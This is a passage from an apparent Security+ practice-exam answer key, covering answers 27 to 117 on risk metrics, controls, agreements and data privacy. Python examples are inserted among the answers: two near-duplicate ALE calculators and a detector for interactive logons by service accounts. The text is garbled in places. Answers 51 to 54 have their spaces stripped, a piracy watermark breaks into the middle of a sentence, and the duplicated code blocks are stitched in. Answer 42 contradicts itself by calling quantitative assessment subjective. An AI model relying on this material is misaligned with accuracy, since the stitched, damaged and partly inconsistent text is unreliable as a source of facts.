27. C. Sharing of profits and losses and the addition or removal of a partner, as well as the responsibilities of each partner, are typically included in a BPA (business partner agreement). Expectations between parties such as a company and an Internet service provider are typically found in a service level agreement (SLA). Expectations include the level of performance given during the contractual service. An SLA will provide a clear means of determining whether a specific function or service has been provided according to the agreed-on level of performance. Security requirements associated with interconnecting IT systems are typically found in an interconnection security agreement, or ISA.

28. D. A backup generator is a compensating control, an alternate control that replaces the original control when it cannot be used due to limitations of the environment. A firewall is considered a preventive control, a security guard is considered a physical control, and an IDS (intrusion detection system) is considered a detective control.

29. A. Preventive controls stop an action from happening; in this scenario, preventing an unauthorized user from gaining access to the network when the user steps away. A corrective control is designed to correct a situation, a deterrent control is used to deter a security breach, and a detective control is designed to uncover a violation.

30. C. Job rotation allows individuals to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee's attack is easier when multiple employees understand the company's security posture. Separation of duties is the concept of having more than one person required to complete a task, allowing problems to be noted by others involved. A mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities while the person who normally performs them is out of the office. Onboarding is the process of adding an employee to a company's identity and access management system or other infrastructure.

31. B. Data minimization is the process of ensuring that only data that is required for business functions is collected and maintained. Tony should ensure that his organization is minimizing the data collected. Data masking redacts data but does not decrease how much is collected. Tokenization replaces sensitive values with a unique identifier that can be looked up in a lookup table. Anonymization removes the ability to identify individuals from data but is quite difficult.

32. A. Risk avoidance is a strategy to deflect threats in order to avoid the costly and disruptive consequences of a damaging event. It also attempts to minimize vulnerabilities that can pose a threat. A risk register is a document that tracks an organization's risks and information about the risks like who owns it, if it is being remediated, and similar details. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat.

33. D. Systems should be restored within four hours with a minimum loss of one day's worth of data. The RTO (recovery time objective) is the amount of time within which a process or service must be restored after a disaster to meet business continuity. It defines how much time it takes to recover after notification of process disruption. The recovery point objective, or RPO, specifies the amount of time that can pass before the amount of data lost may exceed the organization's maximum tolerance for data loss.

34. A. A data retention policy defines how long an organization will keep data. Removing sensitive documents not in use is a clean desk policy. A formal process for managing configuration changes is change management, and a memorandum of understanding consists of legal documents that describe mutual agreement between two parties.

35. B. ALE (annual loss expectancy) is the product of the ARO (annual rate of occurrence) and the SLE (single loss expectancy) and is mathematically expressed as ALE = ARO × SLE. Single loss expectancy is the cost of any single loss, and it is mathematically expressed as SLE = AV (asset value) × EF (exposure factor).

36. B. The Center for Internet Security (CIS) benchmarks provide recommendations for how to secure an operating system, application, or other covered technology. Michelle will find Windows 10-specific security configuration guidelines and techniques.

37. A. Preventive controls like data backups are proactive and are used to avoid a security breach or an interruption of critical services before they can happen. Security cameras, smoke detectors, and door alarms are examples of detective controls. Detective controls detect intrusion as it happens and uncover a violation.

38. C. Risk transfer is the act of moving the risk to hosted providers who assume the responsibility for recovery and restoration, or of acquiring insurance to cover the costs emerging from a risk. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether.

39. D. A preventive control is used to avoid a security breach or an interruption of critical services before they can happen. Administrative controls are defined through policies, procedures, and guidelines. A compensating control is used to satisfy a requirement for a security measure that is too difficult or impractical to implement at the current time. A deterrent control is used to deter a security breach.

40. C. Mean time between failures (MTBF) is a measurement to show how reliable a hardware component is. MTTR (mean time to repair) is the average time it takes for a failed device or component to be repaired or replaced. An RPO (recovery point objective) is the period of time a company can tolerate lost data being unrecoverable between backups. ALE (annual loss expectancy) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).

41. C. A single point of failure (SPOF) is a single weakness that can bring an entire system down and prevent it from working. Cloud computing allows the delivery of hosted services over the Internet. Load balancing spreads traffic or other load between multiple systems or servers. Virtualization uses a system to host virtual machines that share the underlying resources such as RAM, hard drive, and CPU.

42. A. Quantitative risk analysis requires complex calculations and is more time-consuming because it requires detailed financial data and calculations. Quantitative risk assessment is often subjective and requires expertise on systems and infrastructure, and both types of assessment can provide clear answers on risk-based questions.

43. D. A custodian configures data protection based on security policies. The local community bank is the data owner, not Leigh Ann. Leigh Ann is a network administrator, not a user, and power user is not a standard security role in the industry.

44. B. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether. Risk transfer is the act of moving the risk to other organizations like insurance providers or hosting companies who assume the responsibility for recovery and restoration, or of acquiring insurance to cover the costs emerging from a risk.

45. A. Data owners assign labels such as top secret to data. Custodians assign security controls to data. A privacy officer ensures that companies comply with privacy laws and regulations. System administrators are responsible for the overall functioning of IT systems.

46. C. Employees can leak a company's confidential information. Exposing a company's information could put the company's security position at risk because attackers can use this information as part of attacks against the company. Gaining access to a computer's MAC address is not relevant to social media network risk. Gaining access to a computer's IP address is not relevant to social media network risk. Employees can easily express their concerns about a company in general. This is not relevant to social media network risk as long as the employee doesn't reveal any confidential information.

47. C. Separation of duties is the concept of having more than one person required to complete a task. A background check is a process that is performed when a potential employee is considered for hire. Job rotation allows individuals to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee's attack is easier when multiple employees understand the company's security posture. Collusion is an agreement between two or more parties to defraud a person of their rights or to obtain something that is prohibited by law.

48. B. ALE (annual loss expectancy) = SLE (single loss expectancy) × ARO (annualized rate of occurrence). SLE equals $750,000 (2,500 records × $300), and ARO equals 5%, so $750,000 times 5% equals $37,500.
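The SLE and ALE formulas from questions 12, 35, and 48, carried through in code as an added example (not code from the book), with the questions' own figures as input. The cost/benefit helper at the end goes beyond the page's formulas: it is a hypothetical check that compares the ALE a control removes against the control's yearly cost, which is how a quantitative assessment decides between mitigation and risk acceptance.

```python
"""Quantitative risk figures from the Security+ answer key: SLE, ARO, ALE.

Added worked example, not the book's code. Input values are the ones the
questions state (Q12: $16,000 asset, 0.35 exposure factor; Q48: 2,500 records
at $300 each, 5% annualized rate of occurrence).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskScenario:
    name: str
    asset_value: float       # AV: dollar value of the asset at risk
    exposure_factor: float   # EF: fraction of AV lost in one incident (0.0 to 1.0)
    aro: float               # ARO: expected number of occurrences per year


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV x EF (Q35): the cost of a single occurrence of the loss."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be between 0 and 1")
    return round(asset_value * exposure_factor, 2)


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO (Q35, Q48): the expected loss per year."""
    if aro < 0:
        raise ValueError("ARO cannot be negative")
    return round(sle * aro, 2)


def scenario_ale(scenario: RiskScenario) -> float:
    """Chain both formulas for one scenario."""
    sle = single_loss_expectancy(scenario.asset_value, scenario.exposure_factor)
    return annualized_loss_expectancy(sle, scenario.aro)


def control_is_worthwhile(scenario: RiskScenario, ale_after: float,
                          annual_control_cost: float) -> bool:
    """Hypothetical cost/benefit test (not from the book): a control is worth
    implementing only if the annual loss it removes exceeds its annual cost;
    otherwise accepting the risk (Q16, Q44) is the rational choice."""
    return (scenario_ale(scenario) - ale_after) > annual_control_cost


# Constructed scenarios using the figures given in the questions.
# Q12 states no ARO, so one occurrence per year is an assumption here.
Q12 = RiskScenario("Q12 asset", asset_value=16_000, exposure_factor=0.35, aro=1.0)
# Q48: the $750,000 SLE is 2,500 records x $300, i.e. the whole asset is lost (EF 1.0).
Q48 = RiskScenario("Q48 records", asset_value=2_500 * 300, exposure_factor=1.0, aro=0.05)

if __name__ == "__main__":
    for s in (Q12, Q48):
        sle = single_loss_expectancy(s.asset_value, s.exposure_factor)
        print(f"{s.name}: SLE = ${sle:,.2f}  ALE = ${annualized_loss_expectancy(sle, s.aro):,.2f}")
    # With the Q48 figures, a $20,000/year control that eliminates the risk pays for itself;
    # a $50,000/year one does not, so the risk would be accepted or transferred instead.
    print("Q48 $20k control worthwhile:", control_is_worthwhile(Q48, 0.0, 20_000))
    print("Q48 $50k control worthwhile:", control_is_worthwhile(Q48, 0.0, 50_000))
```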

49. C. RPO (recovery point objective) specifies the allowable data loss. It is the amount of time that can pass during an interruption before the quantity of data lost during that period surpasses business continuity planning's maximum acceptable threshold. MTBF (mean time between failures) is the rating on a device or component that predicts the expected time between failures. MTTR (mean time to repair) is the average time it takes for a failed device or component to be repaired or replaced. ARO (annual rate of occurrence) is the ratio of an estimated possibility that a threat will take place within a one-year time frame.

50. D. A data retention policy states how data should be stored based on various types, such as storage location, amount of time the data should be retained, and the type of storage medium that should be used. A clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. An AUP, or acceptable use policy, describes the limits and guidelines for users to make use of an organization's physical and intellectual resources. This includes allowing or limiting the use of personal email during work hours. A security policy defines how to secure physical and information technology assets. This document should be continuously updated as technology and employee requirements change.

51. C. Onboardingistheprocessofaddinganemployeetocompany’sidentityandaccessmanagementsystem.Offboardingistheprocessofremovingan

Telegram Channel @nettrain

employeefromthecompany’sidentityandaccessmanagementsystem.Asystemownerisanindividualwhoisinchargeofmanagingoneormoresystemsandcanincludepatchingandupdatingoperatingsystems.Anexecutiveuserwasmadeupforthisquestion.

52. B. Separationofdutycanbeclassifiedasanoperationalcontrolthatattemptstominimizefraudbyensuringthatanindividualcannotexploitaprocessandconcealtheerrorsorissuesthattheyarecreating.Itisnotaphysicalcontroloratechnicalcontrol,andnothinginthequestionindicatesthatthisiscompensatingforgapsleftbyanothercontrol.

53. D. TheGeneralDataProtectionRegulation(GDPR)doesnotincludearighttoanonymity,althoughorganizationsmustbeabletoprovidesecuritysafeguardsthatmayincludeanonymizationwhereappropriate.

54. D. TheNISTRMF’sprocessis.

1. Prepare

2. Categorizesystem

3. Selectcontrols

4. Implementcontrols

5. Assesscontrols

6. Authorizesystem

7. Monitorcontrols

55. B. Security program administrators often use different types of training to ensure that trainees who react and respond differently to training are given training that helps them. There may be other valid reasons, but this is the most common reason for training diversity.

56. A. Risks that the organization itself creates are internal risks. External risks are those created by factors outside the organization's control. Qualitative and quantitative are both types of risk assessment, rather than categorizations of risk.

57. B. Risk registers are documents used by organizations to track and manage risks and include information such as the owner or responsible party, details about the risk, and other useful information. Statements on Standards for Attestation Engagements (SSAEs) are audit reports, the Payment Card Industry Data Security Standard (PCI-DSS) is a security standard used for credit card operations, and risk table is not a common industry term.

58. C. The mean time to repair (MTTR) for a system or device is the average time that it will take to repair it if it fails. The MTTR is used as part of business continuity planning to determine if a system needs additional redundancy or other options put in place if a failure and repair would exceed the maximum tolerable outage. It is calculated by dividing the total maintenance time by the total number of repairs. MTBF is the mean time between failures, MTTF the mean time to fail, and MITM is an on-path attack, a term that has been increasingly replaced with on-path.

59. D. Common results of breaches like this include identity theft using the personal information of the customers, financial loss to the company due to breach costs and lawsuits, and reputational loss. Since the incident response process is over, Olivia's company should have remediated the underlying issues that led to the breach, hopefully preventing further downtime and thus availability loss.

60. D. There is no civilian classification level for government data. Data may be unclassified, or sensitive but unclassified. Top Secret, Secret, and Confidential are all commonly used classifications.

61. B. The source code for a product is not typically used as a location for privacy terms and conditions. Instead, they are in the contract, user license or related legal terms, or in a formal privacy notice.

62. B. Pseudonymization can allow reidentification of the data subject if additional data is available. Properly done anonymization cannot be reversed. Anonymization techniques will group information so that individuals cannot be identified from data and use other techniques to prevent additional information from leading to de-anonymization of individuals.

63. A. A data governance policy clearly states who owns the information collected and used by an organization. Information security policies provide the high-level authority and guidance for security programs and efforts. Acceptable use policies (AUPs) define what information resources can be used for and how. Data retention policies establish what information an organization will collect and how long it will be kept before destruction.

64. C. Helen has created a functional recovery plan focused on a specific technical and business function. A disaster recovery plan (DRP) has a broader perspective and might include multiple functional recovery plans. RPOs, or recovery point objectives, and MTBF, or mean time between failures, are not types of plans typically built by organizations.

65. B. Health information may be covered by state, local, or federal law, and Greg's organization should ensure that they understand any applicable laws before storing, processing, or handling health information.

66. C. Control risks specifically apply to financial information, where they may impact the integrity or availability of the financial information.

67. D. An individual is most likely to face identity theft issues if their personally identifiable information (PII) is stolen or breached.

68. C. It is common practice to prohibit interactive logins to a GUI or shell for service accounts. Use of a service account for interactive logins, or attempting to log in as one, should be immediately flagged and alerted on as an indicator of compromise (IoC).

69. C. Asset management policies typically include all stages of an asset's lifecycle, and asset tags like those described are used to track assets in many organizations. Change management, incident response, and acceptable use policies do not require asset tagging.

70. D. The diagram shows a fully redundant internal network with pairs of firewalls, routers, and core switches, but with a single connection to the Internet. This means that Megan should consider how her organization would connect to the outside world if that link was severed or disrupted. There is no indication whether this is a wired or wireless link, and the image does not show a redundant link.

71. D. Emma should categorize this as a supply chain risk. When organizations cannot get the systems, equipment, and supplies they need to operate, it can have a significant impact on their ability to conduct business. That could create financial risk, but financial risk is not the direct risk here. There is no indication that the vendor will not support the systems, nor is there any information about whether there is an integration issue in the description.

72. A. An intrusion detection system (IDS) can detect attacks, and is a detective control. Since it is a technical system rather than a physical control or an administrative policy or procedure, Henry can correctly categorize it as a technical, detective control.

73. C. The Federal Trade Commission (FTC) does not provide security configuration guides or benchmarks for operating systems or devices. The Center for Internet Security (CIS), Microsoft (and other vendors), and the National Security Agency (NSA) all provide configuration benchmarks.

74. C. Legacy systems that no longer receive support are a significant concern because they cannot be patched if security vulnerabilities are discovered. Windows 2008 reached its end of life in January 2020. It ran on both 32-bit and 64-bit platforms, and you can still install modern web servers on it.

75. B. Patching is a form of avoidance because it works to remove a risk from the environment. Acceptance of flaws that need patching would involve leaving the software unpatched; mitigation strategies might include firewalls, intrusion prevention systems (IPSs), or web application firewall (WAF) devices; and transference options include third-party hosting or services.

76. B. Risk heat maps or a risk matrix can allow an organization to quickly look at risks and compare them based on their probability and impact or other rating elements. Qualitative and quantitative risk assessments are types of assessment, not means of presenting risk information in an easy-to-understand format, and risk plots are not a common term used in the field.

77. A. The fines that can result from violation or infringement of regulations like the General Data Protection Regulation can have a significant impact on an organization, or could even potentially put it out of business. Due to this, organizations will track compliance with regulations as part of their risk posture.

78. D. Disaster recovery requires forethought and preparation, response to issues to minimize impact during a disaster, and response activities after a disaster. Thus, a complete disaster recovery plan should include actions that may or will occur before, during, and after a disaster, and not just the recovery process after the fact.

79. B. Although data breaches could result in termination of a card processing agreement, the fact that her organization is noncompliant is most likely to result in a fine. PCI-DSS, or Payment Card Industry Data Security Standard, is a vendor standard, not a law, and criminal charges would not typically be filed in a situation like this.

80. C. The Cloud Security Alliance's Cloud Control Matrix maps existing standards to common control descriptions, allowing control requirements to be compared and validated across many standards and regulations. The CSA reference architecture is a set of standard designs, and ISO 27001 and ISO 27002 are standards for managing information security.

81. B. Gamification makes training into a game to get more involvement and interest. Scoring points and receiving rewards, either in-game or virtually, can have a significant positive impact on the response to training. Capture-the-flag events focus on techniques like finding hidden information or otherwise obtaining "flags" as part of a contest. Phishing campaigns send fake phishing emails to staff to identify individuals who may fall for them. Role-based training focuses on training specifically for the role or job that an individual has or will have.

82. D. The General Data Protection Regulation, or GDPR, requires a data protection officer (DPO). They oversee the organization's data protection strategy and implementation, and make sure that the organization complies with the GDPR.

83. D. Although recovering from a breach can be costly, the loss of data like intellectual property in circumstances like these is the most critical issue. The institution is likely to suffer reputational harm and may not be trusted to conduct research like this in the future, leading to an even greater cost to the university's ability to do new research with the government.

84. B. Mission-essential functions are defined as those functions that an organization must run throughout a disaster or that must be resumed as quickly as possible after one if they cannot be sustained. They are the core functions of the organization and are key to its success and ongoing existence. A single point of failure (SPOF) is a point where a device, system, or resource can fail and cause an entire function or organization to no longer work. Recovery time objectives (RTOs) are the time allotted to return to normal functionality. Core recovery functions were made up for this question.

85. B. An SLA (service level agreement) defines the level of service the customer expects from the service provider. The level of service definitions should be specific and measurable in each area. An MOU (memorandum of understanding) is a legal document that describes a mutual agreement between parties. An ISA (interconnection security agreement) is an agreement that specifies the technical and security requirements of the interconnection between organizations. A BPA (business partnership agreement) is a legal agreement between partners. It establishes the terms, conditions, and expectations of the relationship between the partners.

86. A. Customer data can include any information that a customer uploads, shares, or otherwise places in or creates via a service. Customers may have contractual security guarantees in the terms of service, and notification or other clauses may also impact what Rick needs to do if the data is breached. PII is personally identifiable information like name, address, or other details that can identify a person. Financial information may include bills, account balances, and similar details. Health information covers a broad range of data about an individual's medical and health status or history.

87. C. Theft of proprietary information like a formula or code is an example of intellectual property (IP) theft. The cost of an IP theft loss can be harder to quantify in many cases, but it can have a significant impact on an organization that relies on the IP for its business. External risk is risk created by factors outside the organization, internal risk is created by the organization itself or its decisions, and licensing risk exists through software and other contracts.

88. B. This is an example of a personnel credential policy since it applies to the staff who are employed by his organization. Policies like this help to ensure that accounts are not shared or reused. There is no mention of specific devices, service accounts, or administrative accounts.

89. C. The likelihood of occurrence, or probability, is multiplied by the impact to determine a risk's severity.

90. D. Organizations can decide how they want to determine asset value, but consistency is important in many cases. Thus, the original cost, the replacement cost, or a depreciated cost may be used.

91. A. A business impact analysis (BIA) helps to identify critical systems by determining which systems will create the largest impact if they are not available. MTBF is the mean time between failures, an RTO is a recovery time objective, and an ICD was made up for this question.

92. D. The most common means of transferring breach risk is to purchase cybersecurity insurance. Accepting breaches is rarely considered a valid risk process, blaming breaches on competitors does not actually transfer risk, and selling data to another organization is not a risk handling process but may be a business process.

93. B. Service accounts are not typically allowed to use interactive logins, and thus prohibiting interactive logins is a common security policy for them. Limited login hours or locations are more commonly used for employee accounts when they should not be accessing resources after hours or from nonwork locations. Frequent password expiration for service accounts is actually likely to cause a service outage, and many service accounts have complex passwords and are set with longer password expiration time frames or are set to never expire.
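Questions 68 and 93 both treat an interactive logon by a service account (or an attempt at one) as an indicator of compromise. The following added example, which is not from the book, shows how that policy can be checked against logon events: it assumes service accounts carry an `svc_` name prefix and that each event is a JSON record shaped like a Windows 4624/4625 logon event, and the sample log lines are constructed.

```python
"""Flag interactive logons (or attempts) by service accounts.

Added example, not part of the book. Assumptions: service accounts are
named with an "svc_" prefix (a convention assumed here), and each log
line is a JSON record carrying the fields of a Windows logon event
(event_id 4624 = successful logon, 4625 = failed logon, plus the numeric
logon_type). Logon types 2, 10 and 11 put a user at a desktop or shell,
which the policy in the text forbids for service accounts.
"""
import json
from dataclasses import dataclass

# Logon types of Windows events 4624/4625 that are interactive.
INTERACTIVE_LOGON_TYPES = {
    2: "Interactive",
    10: "RemoteInteractive",
    11: "CachedInteractive",
}
LOGON_EVENT_IDS = {4624: "success", 4625: "failure"}
SERVICE_ACCOUNT_PREFIX = "svc_"  # assumed naming convention


@dataclass(frozen=True)
class Alert:
    timestamp: str
    account: str
    host: str
    logon_type: int
    logon_kind: str  # e.g. "Interactive"
    outcome: str     # "success" or "failure"


def is_service_account(account: str) -> bool:
    """True when the account name follows the assumed service-account convention."""
    return account.lower().startswith(SERVICE_ACCOUNT_PREFIX)


def detect_service_account_interactive_logons(lines):
    """Return one Alert per service-account logon event with an interactive type.

    Failed attempts (4625) are reported too: the text treats the attempt
    itself as an IoC, not only a successful logon.
    """
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than stop the detector
        outcome = LOGON_EVENT_IDS.get(event.get("event_id"))
        if outcome is None:
            continue  # not a logon event
        account = event.get("account", "")
        if not is_service_account(account):
            continue
        kind = INTERACTIVE_LOGON_TYPES.get(event.get("logon_type"))
        if kind is None:
            continue  # service (5), batch (4) or network (3) logons are expected
        alerts.append(Alert(
            timestamp=event.get("timestamp", ""),
            account=account,
            host=event.get("host", ""),
            logon_type=event["logon_type"],
            logon_kind=kind,
            outcome=outcome,
        ))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_LOG = """
{"timestamp": "2021-03-01T02:00:05Z", "event_id": 4624, "account": "svc_backup", "host": "FS01", "logon_type": 5}
{"timestamp": "2021-03-01T02:00:09Z", "event_id": 4624, "account": "alice", "host": "WS17", "logon_type": 2}
{"timestamp": "2021-03-01T02:14:31Z", "event_id": 4624, "account": "svc_backup", "host": "FS01", "logon_type": 10}
{"timestamp": "2021-03-01T02:15:02Z", "event_id": 4625, "account": "svc_db", "host": "DB02", "logon_type": 2}
{"timestamp": "2021-03-01T02:16:40Z", "event_id": 4624, "account": "svc_web", "host": "WEB01", "logon_type": 3}
this line is not JSON and is skipped
{"timestamp": "2021-03-01T02:20:00Z", "event_id": 4634, "account": "svc_db", "host": "DB02", "logon_type": 2}
"""


def run_sample():
    """Run the detector over the constructed log and return the alerts."""
    return detect_service_account_interactive_logons(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(f"{alert.timestamp} {alert.account}@{alert.host}: "
              f"{alert.logon_kind} logon ({alert.outcome})")
```

Service-type (5) and network (3) logons by the same accounts are left alone, since those are the logons a service account is expected to perform.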

94. C. The cost of a breach is an example of the impact of a breach. Probability is how likely the risk is to occur, and risk severity is calculated by multiplying probability and impact.

95. B. Sean is conducting a site risk assessment that will help him understand and communicate the risks that the site itself has. If the location is in a FEMA-identified floodplain, or if there are concerns about tornadoes or other natural disasters, those need to be taken into account as the organization makes its decisions about the location. A BIA identifies mission-critical functions and the systems that support them. Crime prevention through environmental design is a design concept that uses the design of facilities to reduce the likelihood of criminal actions through use of lighting and other controls. Business continuity planning focuses on how to keep an organization operating despite disruptions.

96. D. A SOC 2 engagement assesses the security and privacy controls that are in place, and a Type 2 report provides information on the auditor's assessment of the effectiveness of the controls that are in place. A SOC 1 report assesses the controls that impact the accuracy of financial reporting. Type 1 reports are a review of the auditor's opinion of the description provided by management about the suitability of the controls as designed. They do not look at the actual operating effectiveness of the controls.

97. B. Ensuring that leadership throughout an organization is aware of the risks the organization faces and that they are regularly updating and providing feedback on those risks helps increase risk awareness. Inherent risk is risk that exists before controls are in place, and residual risk is risk that remains after controls are in place. Risk appetite is the risk that an organization is willing to take as part of doing business.

98. C. State laws often include breach notification thresholds and requirements that organizations must follow. Laura should ensure that she is both aware of the breach laws for her state and any other states or countries her company operates in, and that her incident response plans have appropriate processes in place if a breach occurs. Organizations that process data like SSNs are unlikely to delete them even if a breach occurs, reclassifying data would not help unless the data was improperly classified before the breach, and data minimization plans are used to limit how much data an organization has, not to respond to a breach directly.

99. C. Nondisclosure agreements (NDAs) are signed by an employee at the time of hiring, and they impose a contractual obligation on employees to maintain the confidentiality of information. Disclosure of information can lead to legal ramifications and penalties. NDAs cannot ensure a decrease in security breaches. A job rotation policy is the practice of moving employees between different tasks to promote experience and variety. Separation of duties has more than one person required to complete a task. A mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities.

100. B. Olivia should establish a service level agreement (SLA) with her provider to ensure that they meet the expected level of service. If they don't, financial or other penalties are typically included. Olivia should ensure that those penalties are meaningful to her vendor to make sure they are motivated to meet the SLA. An MOU is a memorandum of understanding and explains the relationship between two organizations; an MSA is a master services agreement, which establishes a business relationship under which additional work orders or other documentation describe the actual work that is done; and a BPA is a business partnership agreement, which is used when companies wish to partner on efforts and may outline division of profits or responsibilities in the partnership.

101. D. The most accurate risk descriptor for this is software compliance. Although this is an internal risk, software compliance fully describes the issue. Intellectual property (IP) theft risk occurs when an organization's intellectual property is stolen, not when license violations for third parties occur. This is not a legacy system, or at least it was not described that way in the question.

102. D. Inherent risk is the risk that an organization faces before controls are put in place. Without risk assessment and controls in place, Gary must first deal with the inherent risks the organization has as it exists today. Residual risk is the risk that is left after controls are put in place. The theft of intellectual property (IP) like algorithms, formulas, and processes is an IP risk, and multiparty risk is risk that impacts more than one group, company, or person.

103. A. The single loss expectancy (SLE) describes what a single risk event is likely to cost. It is calculated using the asset value (AV) times the exposure factor (EF), which is an estimated percentage of the cost that will occur in damage if the loss occurs. MTTR is the mean time to restore, ARO is the annual rate of occurrence, and RTO is the recovery time objective. These are not part of the SLE equation.

104. C. Third-party credential policies address how contractors' and consultants' credentials are handled. This may require sponsorship by an internal staff member, additional controls regarding password resets or changes, and shorter lifespans, among other controls and requirements.

105. B. Annual rate of occurrence (ARO) is expressed as the number of times an event will occur in a year. Wayne has estimated that the risk event that is being assessed will happen three times a year.
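Questions 48, 89, 103 and 105 use the quantitative risk formulas SLE = AV × EF, ALE = SLE × ARO and severity = probability × impact. The following added example, which is not from the book, carries them through in code: it reproduces the question 48 figures (2,500 records at $300 each, 5% ARO) and the question 105 ARO of 3, and goes one step beyond the page by comparing a control's annual cost against the ALE it removes; every other figure is constructed.

```python
"""Quantitative risk figures from the answer explanations (added example).

Formulas as stated in the text: SLE = AV x EF, ALE = SLE x ARO, and
qualitative severity = probability x impact. The record count, per-record
cost and 5% ARO come from question 48 and the ARO of 3 from question 105;
every other figure below is constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class QuantitativeRisk:
    name: str
    asset_value: float      # AV, in dollars
    exposure_factor: float  # EF, fraction of AV lost in one event (0.0-1.0)
    aro: float              # annualized rate of occurrence, events per year

    def __post_init__(self):
        if not 0.0 <= self.exposure_factor <= 1.0:
            raise ValueError("exposure factor must be a fraction between 0 and 1")
        if self.aro < 0:
            raise ValueError("ARO cannot be negative")

    def sle(self) -> float:
        """Single loss expectancy: what one occurrence is expected to cost."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annual loss expectancy: SLE scaled by how often the event happens per year."""
        return self.sle() * self.aro


def record_breach_risk(records: int, cost_per_record: float, aro: float) -> QuantitativeRisk:
    """Question 48 takes the full per-record cost as the loss, i.e. EF = 1.0."""
    return QuantitativeRisk("customer record breach", records * cost_per_record, 1.0, aro)


def aro_from_interval(years_between_events: float) -> float:
    """ARO for an event expected once every N years (e.g. 0.05 for once in 20 years)."""
    return 1.0 / years_between_events


def qualitative_severity(probability: int, impact: int, scale: int = 5) -> int:
    """Severity = probability x impact on a 1..scale rating, as in question 89."""
    for value in (probability, impact):
        if not 1 <= value <= scale:
            raise ValueError(f"ratings must be between 1 and {scale}")
    return probability * impact


def control_net_benefit(before: QuantitativeRisk, after: QuantitativeRisk,
                        annual_control_cost: float) -> float:
    """Reduction in ALE minus what the control costs per year (positive = worth buying).

    This comparison is a standard extension of ALE, not something the text spells out.
    """
    return before.ale() - after.ale() - annual_control_cost


def rank_by_ale(risks):
    """Largest annual loss expectancy first, for a risk register view."""
    return sorted(risks, key=lambda r: r.ale(), reverse=True)


if __name__ == "__main__":
    q48 = record_breach_risk(records=2500, cost_per_record=300, aro=0.05)
    print(f"Q48: SLE ${q48.sle():,.0f}, ALE ${q48.ale():,.0f}")
    # A control that cuts the breach likelihood to once in 40 years (constructed figure)
    with_control = QuantitativeRisk(q48.name, q48.asset_value, 1.0, aro_from_interval(40))
    print(f"net benefit of a $10,000/yr control: "
          f"${control_net_benefit(q48, with_control, 10_000):,.0f}")
```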

106. D. Although humans can create fires or floods, industrial accidents are the only item on the list that is exclusively a person-made disaster.

107. C. Information on a website made available to customers is typically classified as public information because it is easily available and intentionally exposed to them. Confidential, sensitive, or critical information is unlikely to be exposed to customers without a specific data handling agreement and additional security layers.

108. D. Data processors are service providers that process data for data controllers. A data controller or data owner is the organization or individual who collects and controls data. A data steward carries out the intent of the data controller and is delegated responsibility for the data. Data custodians are those who are entrusted with the data to store, manage, or secure the data.

109. D. Data masking partially redacts sensitive data by replacing some or all information in a sensitive data field with blanks or other replacement characters. Tokenization replaces sensitive data with unique identifiers using a lookup table. Hashing performs a one-way function on a value to get a unique hash, and encryption protects data using an algorithm that can be reversed to restore the original data while allowing for confidentiality and integrity validation.

110. C. The Cloud Security Alliance's reference architecture includes information about tools in a vendor-neutral manner. CIS provides vendor-specific benchmarks for AWS, Azure, and Oracle's cloud offerings. The International Organization for Standardization (ISO) and the National Institute of Standards and Technology (NIST) do not offer this type of resource.

111. C. Locks are physical controls. An example of a managerial control would be a policy or practice, a technical control can include things like firewalls or antivirus, and corrective controls are put in place to ensure that a problem or gap in another control is fixed.

112. C. Control risk is a term used in public accounting. It is the risk that arises from a potential lack of internal controls within an organization that may cause a material misstatement in the organization's financial reports. In this case, the lack of controls that would validate the financial system's data and function is a control risk.

113. C. Although fires, oil spills, and wars are all potential examples of person-made disasters, hurricanes remain solely a natural disaster. Some disasters could be either a person-made or a natural disaster. For example, fires can be caused by humans or by nature, as can floods, and even chemical spills when an earthquake occurs.

114. C. Confidential information is classified by the U.S. government as information that requires some protection and that, if disclosed without authorization, would cause identifiable harm to national security. Top Secret information requires the highest degree of protection and would cause exceptionally grave harm if exposed without authorization. Secret information requires a substantial degree of protection and would cause serious damage if exposed. Business Sensitive is not a U.S. government classification but is a term commonly used in businesses.

115. C. Phone numbers uniquely identify individuals, making them an example of personally identifiable information, or PII. PHI is protected health information, financial information includes financial records of all types, and government information is information that belongs to the government or may be classified by the government and entrusted to an organization.

116. B. Tokenization is an ideal option for this scenario. Tokenization replaces a sensitive value with an alternate value that can be looked up in a table when the value needs to be referenced back to its original form. Encryption does not meet this need, data masking only hides part of the value, and data washing is not a commonly used term for techniques of this nature.

117. C. Privacy notices are often included on websites to meet the requirements of laws or regulations like the General Data Protection Regulation (GDPR) or state privacy laws.

